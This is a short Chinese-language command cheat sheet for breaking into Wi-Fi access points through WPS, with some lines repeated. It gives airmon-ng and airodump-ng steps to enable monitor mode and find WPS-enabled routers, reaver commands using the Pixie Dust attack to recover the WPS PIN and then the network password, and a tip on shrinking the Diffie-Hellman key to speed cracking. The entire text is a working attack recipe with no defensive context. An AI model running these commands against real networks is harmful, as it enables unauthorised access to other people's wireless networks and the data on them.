airmon-ng start wlan0 //开启网卡
airodump-ng wlan0mon //监听模式,查找开启wps的ap
reaver -i wlan0mon -b [ap’s mac] -vv -K 1 //reaver破解pin-K 1 选项 结合pixies 灰尘攻击 得到pin码
reaver-i mon0 -b [ap's MAC] -p PIN8位数 //通过wps pin 获取密码
注:
airodump-ng wlan0mon //监听模式,查找开启wps的ap
reaver -i wlan0mon -b [ap’s mac] -vv -K 1 //reaver破解pin-K 1 选项 结合pixies 灰尘攻击 得到pin码
reaver-i mon0 -b [ap's MAC] -p PIN8位数 //通过wps pin 获取密码
注:
reaver -S //生成一个小的DH key 加快破解速度通常一个验证请求会在0.5到3秒内完成,计算Diffie-Hellman共享密钥会占据大量的时间,生成一个很小的DH公钥会使计算变的简单。(如果测试的是realtek 的ap 不要用 -S 选项加快破解速度 )